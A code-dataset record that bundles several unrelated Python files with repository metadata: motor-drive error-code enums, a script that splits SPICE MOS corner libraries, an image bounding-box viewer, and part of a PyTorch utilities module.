] | 9 | 2017-09-30T08:28:42.000Z | 2022-03-12T19:11:43.000Z | from .._ingenialink import ffi, lib
from enum import IntEnum
def err_ipb_last():
"""Get IPB last last occurred error."""
return int(ffi.cast("int", lib.ilerr_ipb_last()))
class CONFIGURATION_ERRORS(IntEnum):
"""Configuration errors."""
INCORRECT_ACCESS_TYPE = 0x06010000
OBJECT_NOT_EXIST = 0x06020000
OBJECT_NOT_CYCLIC_MAPPABLE = 0x06040041
CYCLIC_MAPPING_TOO_LARGE = 0x06040042
WRONG_CYCLIC_KEY = 0x08010000
WRONG_CYCLIC_REGISTER_SIZE = 0x06070010
COMMUNICATION_STATE_UNREACHABLE = 0x08010010
COMMUNICATION_NOT_MODIFIABLE = 0x08010020
UNSUPPORTED_REGISTER_VALUE = 0x060A0000
INVALID_COMMAND = 0x08010030
CRC_ERROR = 0x08010040
UNSUPPORTED_SYNCHRONIZATION = 0x00007400
ACTIVE_FEEDBACKS_HIGHER_THAN_ALLOWED = 0x00007500
COMKIT_TIMEOUT = 0x05040000
| 31.5 | 53 | 0.772894 | from .._ingenialink import ffi, lib
from enum import IntEnum
def err_ipb_last():
"""Get IPB last last occurred error."""
return int(ffi.cast("int", lib.ilerr_ipb_last()))
class CONFIGURATION_ERRORS(IntEnum):
"""Configuration errors."""
INCORRECT_ACCESS_TYPE = 0x06010000
OBJECT_NOT_EXIST = 0x06020000
OBJECT_NOT_CYCLIC_MAPPABLE = 0x06040041
CYCLIC_MAPPING_TOO_LARGE = 0x06040042
WRONG_CYCLIC_KEY = 0x08010000
WRONG_CYCLIC_REGISTER_SIZE = 0x06070010
COMMUNICATION_STATE_UNREACHABLE = 0x08010010
COMMUNICATION_NOT_MODIFIABLE = 0x08010020
UNSUPPORTED_REGISTER_VALUE = 0x060A0000
INVALID_COMMAND = 0x08010030
CRC_ERROR = 0x08010040
UNSUPPORTED_SYNCHRONIZATION = 0x00007400
ACTIVE_FEEDBACKS_HIGHER_THAN_ALLOWED = 0x00007500
COMKIT_TIMEOUT = 0x05040000
| 0 | 0 | 0 |
f9303ec44e5a438900ce95e107a1cc6a734b9336 | 14,078 | py | Python | device modeing/split_lib_v1.0.py | RichardNeverGiveup/data_analysis_for_CMOS | 62a289bd3367b5d3a9ce9ba7f71e920706eafa4b | [
"MIT"
] | null | null | null | device modeing/split_lib_v1.0.py | RichardNeverGiveup/data_analysis_for_CMOS | 62a289bd3367b5d3a9ce9ba7f71e920706eafa4b | [
"MIT"
] | null | null | null | device modeing/split_lib_v1.0.py | RichardNeverGiveup/data_analysis_for_CMOS | 62a289bd3367b5d3a9ce9ba7f71e920706eafa4b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import re
#*******************************************************
# user input:
# MOSNAME eg: lvnemos4_1p2_lvpw
# MOSTYPE eg: _ne_1p2
# LIB_FILENAME = '501per_35_VcA.lib'
# MDL_FILENAME = '501per_35_VcA.mdl'
#********************************************************
MOSNAME = '_llv_rvtp'
MOSTYPE = '_llv_rvtp'
LIB_FILENAME = 'trident_1d2_mos.lib' # 这里需要自己改一下lib和mdl的文件名作为路径。测试阶段先取这个方式来打开文件。
MDL_FILENAME = 'trident_1d2_mos.mdl'
# In[2]:
def get_dict_of_lib(LIB_FILENAME):
"""输入LIB的文件名,返回各个CORNER名为键,其对应的行内容为值的字典。"""
f = open(LIB_FILENAME).readlines()
for line_number, line in enumerate(f):
if ".lib statistical_mc" in line:
end_of_corners_in_lib = line_number
print("初步定位到总LIB的第%d行之前的内容为LIB需要分裂出的内容。"%end_of_corners_in_lib)
list_of_corners_star2end_tuples = []
for line_number, line in enumerate(f[:end_of_corners_in_lib]):
if ".lib" in line:
single_corner_start = line_number
if ".endl" in line:
single_corner_end = line_number
list_of_corners_star2end_tuples.append((single_corner_start, single_corner_end))
corner_param_dict = {}
for t in list_of_corners_star2end_tuples:
key = f[t[0]].split()[1] # tt_llv_corner as key
value = f[t[0]:t[1]+1]
corner_param_dict[key] = value
print("%s已经存入字典,其内容对应行号为%d到%d"%(key, t[0], t[1]))
return corner_param_dict
# In[3]:
def get_dict_of_single_mostype_dict_of_lib(corner_param_dict):
"""紧接着corner_param_dict = get_dict_of_lib(LIB_FILENAME)后面调用,传入含有多个MOSTYPE的LIB字典。
输出只剩一种MOSTYPE的字典。"""
reg_content = "\+.*?" + MOSTYPE + "\s*="
mark_foronetypemos_incorner = re.compile(reg_content)
single_mostype_corner_param_dict = {}
print("和你输入的MOSTYPE匹配的每个CORNER的首行和尾行如下!")
for k in corner_param_dict:
v = corner_param_dict[k]
new_v = []
for line in v:
if mark_foronetypemos_incorner.search(line):
new_v.append(line)
single_mostype_corner_param_dict[k] = new_v
print(new_v[0], new_v[-1])
print("********************************************************************************************************")
return single_mostype_corner_param_dict
# In[4]:
# In[5]:
#corner_param_dict = get_dict_of_lib(LIB_FILENAME)
#get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
# In[6]:
def get_blank_striped_mdl(MDL_FILENAME, MOSNAME):
"""输出是去除了空行的mdl内容。"""
f = open(MDL_FILENAME).readlines()
content_temp_start = '.subckt\s*' + MOSNAME + "\s"
regex_temp_start = re.compile(content_temp_start)
content_temp_end = '.ends\s*' + MOSNAME + "\s"
regex_temp_end = re.compile(content_temp_end)
for line_number, line in enumerate(f):
if regex_temp_start.search(line):
print("定位到总MDL文件的第%d行作为临时起始行"%line_number)
temp_start = line_number
if regex_temp_end.search(line):
print("定位到总MDL文件的第%d行作为临时终止行"%line_number)
temp_end = line_number
tuple_of_linenumber_for_mdl_in_use = (temp_start, temp_end)
temp_start = tuple_of_linenumber_for_mdl_in_use[0] # '.subckt\s*'的行号
temp_end = tuple_of_linenumber_for_mdl_in_use[1] # '.ends\s*'的行号
mdl_in_use = f[temp_start: temp_end+1]
for line_number, line in enumerate(mdl_in_use):
if ".model" in line:
newstart = line_number
mdl_content = mdl_in_use[newstart:]
startlinenumberinoriginalmdl = newstart + temp_start # '.model'在'.subckt\s*'和'.ends\s*'之间的行号
print("定位到总MDL文件的第%d行作为真正的起始行"%startlinenumberinoriginalmdl)
blank_striped_mdl_content = []
for line_number, line in enumerate(mdl_content):
if line.strip() == "":
print("第%d行是空行。"%(startlinenumberinoriginalmdl + line_number ))
continue
blank_striped_mdl_content.append(line)
blank_striped_mdl_content
print("根据你输入的MOSNAME:%s,将从原总MDL中复制第%d行到第%d行。"%(MOSNAME, startlinenumberinoriginalmdl, temp_end))
print("********************************************************************************************************")
return blank_striped_mdl_content
# In[7]:
def clean_all_mis_in_one_line(line):
"""利用从右向左的机制去一直去除_mis参数,返回除去干净了的Line。"""
while True:
if '_mis' in line:
startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# remain 是这样的 "= '0.35 + deta0_ne_1p2 "
original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
if '+' in remain:
for_replacement = remain.strip() + "'"
else:
for_replacement = remain.strip().replace("'","")
line = line.replace(original, for_replacement)
else:
break
return line
# In[8]:
####################测试去除每行中MIS的代码####################################################################################
##################################################################################################################################
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = '0.39 + pnf_ne_1p2_mis' eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# while True:
# if '_mis' in line:
# startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
# startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
# startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
# remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# # remain 是这样的 "= '0.35 + deta0_ne_1p2 "
# original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
# if '+' in remain:
# for_replacement = remain.strip() + "'"
# else:
# for_replacement = remain.strip().replace("'","")
# line = line.replace(original, for_replacement)
# else:
# break
# line
##################################################################################################################################
##################################################################################################################################
# In[9]:
# In[10]:
# #########测试cf去除效果################################################################################################
# #######################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6"
# line = "+clc = 1E-7 cle = 0.6 cf = '0 + 4.5E-11*pre_layout_sw'"
# line = "+clc = 1E-7 cf = '0 + 4.5E-11*pre_layout_sw cle = 0.6 '"
# print(line)
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line[:startof_pre].rfind('=')
# startof_plus = line[:startof_pre].rfind('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line = line.replace(orginal, for_replacement)
# print(line)
# #######################################################################################################################
# In[11]:
# In[12]:
############用于测试替换cf的代码################################################################################################
##################################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6 "
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line.find('=')
# startof_plus = line[startof_cf:startof_pre].find('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line.replace(orginal, for_replacement)
##################################################################################################################################
##################################################################################################################################
# In[13]:
def get_allparams_cleaned_mdl(mydata):
"""输入是被定位出来的含有出事model内容的mdl列表,称为mydata。输出被正则替换掉全部参数的mdl列表"""
# 这一段注释是测试代码,用于验证正则表达式
# pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。
# for line in mydata:
# if "'" in line:
# print(line)
# print(pattern.findall(line))
pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。
without_all_params = []
print("现在执行替换全部MDL参数的函数**************************************************************************************")
print("所有的含义参数的行内容如下*****************************************************************************************")
for line in mydata:
if pattern.search(line):
print(line)
# print(pattern.sub(r'\1', line))
line = pattern.sub(r'\1', line)
without_all_params.append(line)
#without_all_params = without_all_params[:-1] # 去掉最后一个 .ends lvnemos4_1p2_lvpw
print("********************************************************************************************************************")
return without_all_params
# In[14]:
# In[15]:
###########处理LIB的部分#########################################################################
corner_param_dict = get_dict_of_lib(LIB_FILENAME)
single_mostype_corner_param_dict = get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
final_lib_part = get_final_lib_part(MOSNAME, single_mostype_corner_param_dict)
###########处理MDL的部分####################################################################
raw_mdl = get_blank_striped_mdl(MDL_FILENAME,MOSNAME)
mis_cleaned_mdl = get_mis_cleaned_mdl(raw_mdl)
cf_cleaned_mdl = get_cf_cleaned_mdl(mis_cleaned_mdl)
allparams_cleaned_mdl = get_allparams_cleaned_mdl(cf_cleaned_mdl)
############################################################################################
final_lib = get_final_lib(final_lib_part, cf_cleaned_mdl)
libfilename = MOSNAME + '.lib_NEW'
pmfilename = MOSNAME + '.pm_NEW'
with open(libfilename, mode='w') as f:
for line in final_lib:
f.writelines(line)
with open(pmfilename, mode='w') as f:
for line in allparams_cleaned_mdl:
f.writelines(line)
input("输入任意键退出!")
| 38.782369 | 130 | 0.525146 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import re
#*******************************************************
# user input:
# MOSNAME eg: lvnemos4_1p2_lvpw
# MOSTYPE eg: _ne_1p2
# LIB_FILENAME = '501per_35_VcA.lib'
# MDL_FILENAME = '501per_35_VcA.mdl'
#********************************************************
MOSNAME = '_llv_rvtp'
MOSTYPE = '_llv_rvtp'
LIB_FILENAME = 'trident_1d2_mos.lib' # 这里需要自己改一下lib和mdl的文件名作为路径。测试阶段先取这个方式来打开文件。
MDL_FILENAME = 'trident_1d2_mos.mdl'
# In[2]:
def get_dict_of_lib(LIB_FILENAME):
"""输入LIB的文件名,返回各个CORNER名为键,其对应的行内容为值的字典。"""
f = open(LIB_FILENAME).readlines()
for line_number, line in enumerate(f):
if ".lib statistical_mc" in line:
end_of_corners_in_lib = line_number
print("初步定位到总LIB的第%d行之前的内容为LIB需要分裂出的内容。"%end_of_corners_in_lib)
list_of_corners_star2end_tuples = []
for line_number, line in enumerate(f[:end_of_corners_in_lib]):
if ".lib" in line:
single_corner_start = line_number
if ".endl" in line:
single_corner_end = line_number
list_of_corners_star2end_tuples.append((single_corner_start, single_corner_end))
corner_param_dict = {}
for t in list_of_corners_star2end_tuples:
key = f[t[0]].split()[1] # tt_llv_corner as key
value = f[t[0]:t[1]+1]
corner_param_dict[key] = value
print("%s已经存入字典,其内容对应行号为%d到%d"%(key, t[0], t[1]))
return corner_param_dict
# In[3]:
def get_dict_of_single_mostype_dict_of_lib(corner_param_dict):
"""紧接着corner_param_dict = get_dict_of_lib(LIB_FILENAME)后面调用,传入含有多个MOSTYPE的LIB字典。
输出只剩一种MOSTYPE的字典。"""
reg_content = "\+.*?" + MOSTYPE + "\s*="
mark_foronetypemos_incorner = re.compile(reg_content)
single_mostype_corner_param_dict = {}
print("和你输入的MOSTYPE匹配的每个CORNER的首行和尾行如下!")
for k in corner_param_dict:
v = corner_param_dict[k]
new_v = []
for line in v:
if mark_foronetypemos_incorner.search(line):
new_v.append(line)
single_mostype_corner_param_dict[k] = new_v
print(new_v[0], new_v[-1])
print("********************************************************************************************************")
return single_mostype_corner_param_dict
# In[4]:
def get_final_lib_part(MOSNAME, single_mostype_corner_param_dict):
final_lib_part = []
for k in single_mostype_corner_param_dict:
cornerfirstline = ".lib " + k + "\n"
cornersecondline = ".param" + "\n"
cornersecondlastline = ".lib '" + MOSNAME + ".lib' core" + "\n"
cornerlastline = ".endl " + k + "\n\n"
final_lib_part.append(cornerfirstline)
final_lib_part.append(cornersecondline)
for line in single_mostype_corner_param_dict[k]:
final_lib_part.append(line)
final_lib_part.append(cornersecondlastline)
final_lib_part.append(cornerlastline)
return final_lib_part
# In[5]:
#corner_param_dict = get_dict_of_lib(LIB_FILENAME)
#get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
# In[6]:
def get_blank_striped_mdl(MDL_FILENAME, MOSNAME):
"""输出是去除了空行的mdl内容。"""
f = open(MDL_FILENAME).readlines()
content_temp_start = '.subckt\s*' + MOSNAME + "\s"
regex_temp_start = re.compile(content_temp_start)
content_temp_end = '.ends\s*' + MOSNAME + "\s"
regex_temp_end = re.compile(content_temp_end)
for line_number, line in enumerate(f):
if regex_temp_start.search(line):
print("定位到总MDL文件的第%d行作为临时起始行"%line_number)
temp_start = line_number
if regex_temp_end.search(line):
print("定位到总MDL文件的第%d行作为临时终止行"%line_number)
temp_end = line_number
tuple_of_linenumber_for_mdl_in_use = (temp_start, temp_end)
temp_start = tuple_of_linenumber_for_mdl_in_use[0] # '.subckt\s*'的行号
temp_end = tuple_of_linenumber_for_mdl_in_use[1] # '.ends\s*'的行号
mdl_in_use = f[temp_start: temp_end+1]
for line_number, line in enumerate(mdl_in_use):
if ".model" in line:
newstart = line_number
mdl_content = mdl_in_use[newstart:]
startlinenumberinoriginalmdl = newstart + temp_start # '.model'在'.subckt\s*'和'.ends\s*'之间的行号
print("定位到总MDL文件的第%d行作为真正的起始行"%startlinenumberinoriginalmdl)
blank_striped_mdl_content = []
for line_number, line in enumerate(mdl_content):
if line.strip() == "":
print("第%d行是空行。"%(startlinenumberinoriginalmdl + line_number ))
continue
blank_striped_mdl_content.append(line)
blank_striped_mdl_content
print("根据你输入的MOSNAME:%s,将从原总MDL中复制第%d行到第%d行。"%(MOSNAME, startlinenumberinoriginalmdl, temp_end))
print("********************************************************************************************************")
return blank_striped_mdl_content
# In[7]:
def clean_all_mis_in_one_line(line):
"""利用从右向左的机制去一直去除_mis参数,返回除去干净了的Line。"""
while True:
if '_mis' in line:
startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# remain 是这样的 "= '0.35 + deta0_ne_1p2 "
original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
if '+' in remain:
for_replacement = remain.strip() + "'"
else:
for_replacement = remain.strip().replace("'","")
line = line.replace(original, for_replacement)
else:
break
return line
# In[8]:
####################测试去除每行中MIS的代码####################################################################################
##################################################################################################################################
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = -3E-14 eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# line = "+pnfactor = '0.39 + pnf_ne_1p2_mis' eta0 = '0.35 + deta0_ne_1p2_mis' peta0 = '-1.81E-15 + dpeta0_ne_1p2'"
# while True:
# if '_mis' in line:
# startof_mis = line.rfind('_mis') # 从右向左,找到了_mis的位置
# startof_plus_nexttomis = line[:startof_mis].rfind('+') # 找到了第一个紧靠mis左边的+号
# startof_equal_nexttomis = line[:startof_mis].rfind('=') # 找到了第一个紧靠mis左边的=号
# remain = line[startof_equal_nexttomis:startof_plus_nexttomis] #第一个紧靠mis左边的=号到 mis直接的字符,用于判断是纯数字了,还是数字+参数的格式
# # remain 是这样的 "= '0.35 + deta0_ne_1p2 "
# original = line[startof_equal_nexttomis:startof_mis+5] #把含_mis'这部分原始的取出来,如"= '0.35 + deta0_ne_1p2 + deta0_ne_1p2_mis'"
# if '+' in remain:
# for_replacement = remain.strip() + "'"
# else:
# for_replacement = remain.strip().replace("'","")
# line = line.replace(original, for_replacement)
# else:
# break
# line
##################################################################################################################################
##################################################################################################################################
# In[9]:
def get_mis_cleaned_mdl(raw_mdl):
mis_cleaned_mdl = []
print("开始去除MIS参数**********************************************************************************************")
for line in raw_mdl:
if '_mis' in line:
print(line)
line = clean_all_mis_in_one_line(line)
print(line)
mis_cleaned_mdl.append(line)
print("去除MIS参数结束**********************************************************************************************")
return mis_cleaned_mdl
# In[10]:
# #########测试cf去除效果################################################################################################
# #######################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6"
# line = "+clc = 1E-7 cle = 0.6 cf = '0 + 4.5E-11*pre_layout_sw'"
# line = "+clc = 1E-7 cf = '0 + 4.5E-11*pre_layout_sw cle = 0.6 '"
# print(line)
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line[:startof_pre].rfind('=')
# startof_plus = line[:startof_pre].rfind('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line = line.replace(orginal, for_replacement)
# print(line)
# #######################################################################################################################
# In[11]:
def get_cf_cleaned_mdl(mis_cleaned_mdl):
cf_cleaned_mdl = []
print("开始去除CF参数**********************************************************************************************")
for line in mis_cleaned_mdl:
if "cf" in line:
print("替换前的行为:")
print(line)
startof_cf = line.rfind('cf')
startof_pre = line.rfind("pre_layout_sw")
startof_equal = line[:startof_pre].rfind('=')
startof_plus = line[:startof_pre].rfind('+')
for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").replace('*',"").strip() # 得到 '=4.5E-11'
original = line[startof_equal:startof_pre+len("pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
print("我们要替换CF行的表达式是%s。"%for_replacement)
print("原始未替换的CF对应的表达式是%s。"%original)
line = line.replace(original, for_replacement)
print("替换后的行为:")
print(line)
cf_cleaned_mdl.append(line)
cf_cleaned_mdl = cf_cleaned_mdl[:-1] # 去掉最后一个 .ends lvnemos4_1p2_lvpw
print("去除CF参数结束**********************************************************************************************")
return cf_cleaned_mdl
# In[12]:
############用于测试替换cf的代码################################################################################################
##################################################################################################################################
# line = "+cf = '0 + 4.5E-11*pre_layout_sw' clc = 1E-7 cle = 0.6 "
# startof_cf = line.find('cf')
# startof_pre = line.find("*pre_layout_sw")
# startof_equal = line.find('=')
# startof_plus = line[startof_cf:startof_pre].find('+')
# for_replacement = "=" + line[startof_plus:startof_pre].replace('+',"").strip() # 得到 '=4.5E-11'
# orginal = line[startof_equal:startof_pre+len("*pre_layout_sw'")] # 得到 "= '0 + 4.5E-11*pre_layout_sw'"
# line.replace(orginal, for_replacement)
##################################################################################################################################
##################################################################################################################################
# In[13]:
def get_allparams_cleaned_mdl(mydata):
"""输入是被定位出来的含有出事model内容的mdl列表,称为mydata。输出被正则替换掉全部参数的mdl列表"""
# 这一段注释是测试代码,用于验证正则表达式
# pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。
# for line in mydata:
# if "'" in line:
# print(line)
# print(pattern.findall(line))
pattern = re.compile(r"\'([-]*[0-9.E]*\-*\d*)[+-]*.*?\'") # 这是当初为钟灿写的正则,我现在也看不太懂了。
without_all_params = []
print("现在执行替换全部MDL参数的函数**************************************************************************************")
print("所有的含义参数的行内容如下*****************************************************************************************")
for line in mydata:
if pattern.search(line):
print(line)
# print(pattern.sub(r'\1', line))
line = pattern.sub(r'\1', line)
without_all_params.append(line)
#without_all_params = without_all_params[:-1] # 去掉最后一个 .ends lvnemos4_1p2_lvpw
print("********************************************************************************************************************")
return without_all_params
# In[14]:
def get_final_lib(final_lib_part, cf_cleaned_mdl):
lib_core_part = []
lib_core_part.append(".lib core\n")
for line in cf_cleaned_mdl:
lib_core_part.append(line)
lib_core_part.append(".endl core\n")
lib_core_part
final_lib = final_lib_part + lib_core_part
return final_lib
# In[15]:
###########处理LIB的部分#########################################################################
corner_param_dict = get_dict_of_lib(LIB_FILENAME)
single_mostype_corner_param_dict = get_dict_of_single_mostype_dict_of_lib(corner_param_dict)
final_lib_part = get_final_lib_part(MOSNAME, single_mostype_corner_param_dict)
###########处理MDL的部分####################################################################
raw_mdl = get_blank_striped_mdl(MDL_FILENAME,MOSNAME)
mis_cleaned_mdl = get_mis_cleaned_mdl(raw_mdl)
cf_cleaned_mdl = get_cf_cleaned_mdl(mis_cleaned_mdl)
allparams_cleaned_mdl = get_allparams_cleaned_mdl(cf_cleaned_mdl)
############################################################################################
final_lib = get_final_lib(final_lib_part, cf_cleaned_mdl)
libfilename = MOSNAME + '.lib_NEW'
pmfilename = MOSNAME + '.pm_NEW'
with open(libfilename, mode='w') as f:
for line in final_lib:
f.writelines(line)
with open(pmfilename, mode='w') as f:
for line in allparams_cleaned_mdl:
f.writelines(line)
input("输入任意键退出!")
| 2,809 | 0 | 92 |
411c7c1af94a017abfd0a0835864ea506e386df2 | 1,498 | py | Python | check.py | GetYourLocation/Tools | e2d80a088c8b4f43572caff834ee2541eae7a4d5 | [
"MIT"
] | null | null | null | check.py | GetYourLocation/Tools | e2d80a088c8b4f43572caff834ee2541eae7a4d5 | [
"MIT"
] | null | null | null | check.py | GetYourLocation/Tools | e2d80a088c8b4f43572caff834ee2541eae7a4d5 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
import warnings
warnings.filterwarnings("ignore")
try:
dataset = sys.argv[1]
data_dir = os.path.join('data', dataset)
except Exception as e:
print("Usage: python3 %s <directory name>" % sys.argv[0])
sys.exit(0)
DATA_FILE_PATH = os.path.join(data_dir, 'data.csv')
IMG_DIR = os.path.join(data_dir, 'JPEGImages')
ax = plt.gca()
with open(DATA_FILE_PATH, 'r') as data_file:
lines = data_file.readlines()
headers = lines[0].strip().split(',')
for line in lines[1:]:
chunks = line.strip().split(',')
label_name = ''
bbox_str = ''
for i, chunk in enumerate(chunks):
if (i != 0 and chunk != '-'):
label_name = headers[i]
bbox_str = chunk
bbox_strs = chunk.split(' ')
x1 = float(bbox_strs[0])
y1 = float(bbox_strs[1])
width = float(bbox_strs[2]) - x1
height = float(bbox_strs[3]) - y1
break
img = plt.imread(os.path.join(IMG_DIR, chunks[0]))
print("[%s] [%d*%d] [%s] [%s]" % (chunks[0], img.shape[1], img.shape[0], label_name, bbox_str), end='')
sys.stdout.flush()
plt.imshow(img)
rect = Rectangle((x1, y1), width, height)
rect.set_edgecolor('yellow')
rect.set_facecolor('none')
ax.add_patch(rect)
plt.pause(0.001)
input("")
rect.remove()
| 28.807692 | 107 | 0.609479 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
import matplotlib.pyplot as plt
from matplotlib.patches import Rectangle
import warnings
warnings.filterwarnings("ignore")
try:
dataset = sys.argv[1]
data_dir = os.path.join('data', dataset)
except Exception as e:
print("Usage: python3 %s <directory name>" % sys.argv[0])
sys.exit(0)
DATA_FILE_PATH = os.path.join(data_dir, 'data.csv')
IMG_DIR = os.path.join(data_dir, 'JPEGImages')
ax = plt.gca()
with open(DATA_FILE_PATH, 'r') as data_file:
lines = data_file.readlines()
headers = lines[0].strip().split(',')
for line in lines[1:]:
chunks = line.strip().split(',')
label_name = ''
bbox_str = ''
for i, chunk in enumerate(chunks):
if (i != 0 and chunk != '-'):
label_name = headers[i]
bbox_str = chunk
bbox_strs = chunk.split(' ')
x1 = float(bbox_strs[0])
y1 = float(bbox_strs[1])
width = float(bbox_strs[2]) - x1
height = float(bbox_strs[3]) - y1
break
img = plt.imread(os.path.join(IMG_DIR, chunks[0]))
print("[%s] [%d*%d] [%s] [%s]" % (chunks[0], img.shape[1], img.shape[0], label_name, bbox_str), end='')
sys.stdout.flush()
plt.imshow(img)
rect = Rectangle((x1, y1), width, height)
rect.set_edgecolor('yellow')
rect.set_facecolor('none')
ax.add_patch(rect)
plt.pause(0.001)
input("")
rect.remove()
| 0 | 0 | 0 |
5d04d47de01e33c3e1869914561675312dd53ea4 | 6,405 | py | Python | lib/utils.py | pemami4911/symmetric-and-object-centric-world-models | 8a03b08fc840d47602afeffba1a106651becd826 | [
"MIT"
] | 2 | 2020-12-22T08:11:44.000Z | 2022-03-15T21:50:17.000Z | lib/utils.py | pemami4911/symmetric-and-object-centric-world-models | 8a03b08fc840d47602afeffba1a106651becd826 | [
"MIT"
] | null | null | null | lib/utils.py | pemami4911/symmetric-and-object-centric-world-models | 8a03b08fc840d47602afeffba1a106651becd826 | [
"MIT"
] | 1 | 2022-03-15T21:50:18.000Z | 2022-03-15T21:50:18.000Z | import torch
import torch.nn.functional as F
from torch.nn import init
import numpy as np
from scipy.stats import truncnorm
def init_weights(net, init_type='normal', init_gain=0.02):
"""Initialize network weights.
Modified from: https://github.com/baudm/MONet-pytorch/blob/master/models/networks.py
Parameters:
net (network) -- network to be initialized
init_type (str) -- the name of an initialization method: normal | xavier | kaiming | orthogonal
init_gain (float) -- scaling factor for normal, xavier and orthogonal.
We use 'normal' in the original pix2pix and CycleGAN paper. But xavier and kaiming might
work better for some applications. Feel free to try yourself.
"""
net.apply(init_func)
def gmm_loglikelihood(x_t, x_loc, log_var, mask_logprobs):
"""
mask_logprobs: [N, K, 1, H, W]
"""
# NLL [batch_size, 1, H, W]
sq_err = (x_t.unsqueeze(1) - x_loc).pow(2)
# log N(x; x_loc, log_var): [N, K, C, H, W]
normal_ll = -0.5 * log_var - 0.5 * (sq_err / torch.exp(log_var))
# [N, K, C, H, W]
log_p_k = (mask_logprobs + normal_ll)
# logsumexp over slots [N, C, H, W]
log_p = torch.logsumexp(log_p_k, dim=1)
# [batch_size]
nll = -torch.sum(log_p, dim=[1,2,3])
#upper_bound = torch.logsumexp(mask_logprobs - 0.5 * (sq_err / torch.exp(log_var)), dim=1) # [N, C, H, W]
#upper_bound = torch.sum(upper_bound, dim=[1,2,3]) # [N]
return nll, {'log_p_k': log_p_k, 'normal_ll': normal_ll, 'ub': None}
def get_log_var_grad(val_dataloader, model, geco, seq_len, aggregate_over=20):
"""
assume batch_size is 1, compu
"""
opt = torch.optim.SGD(model.parameters(), lr=1)
model.train()
num_grads = 0
for p in model.module.relational_dynamics.parameters():
if p.requires_grad:
num_grads += 1
grads = [[] for i in range(num_grads)]
logvargrads = [[] for i in range(num_grads)]
for i,batch in enumerate(val_dataloader):
imgs = batch['imgs'].to('cuda')
imgs = imgs[:,:seq_len]
model_outs = model(imgs, geco, i, None)
opt.zero_grad()
total_loss = model_outs['total_loss'] # [1] for sample size 1
total_loss.backward()
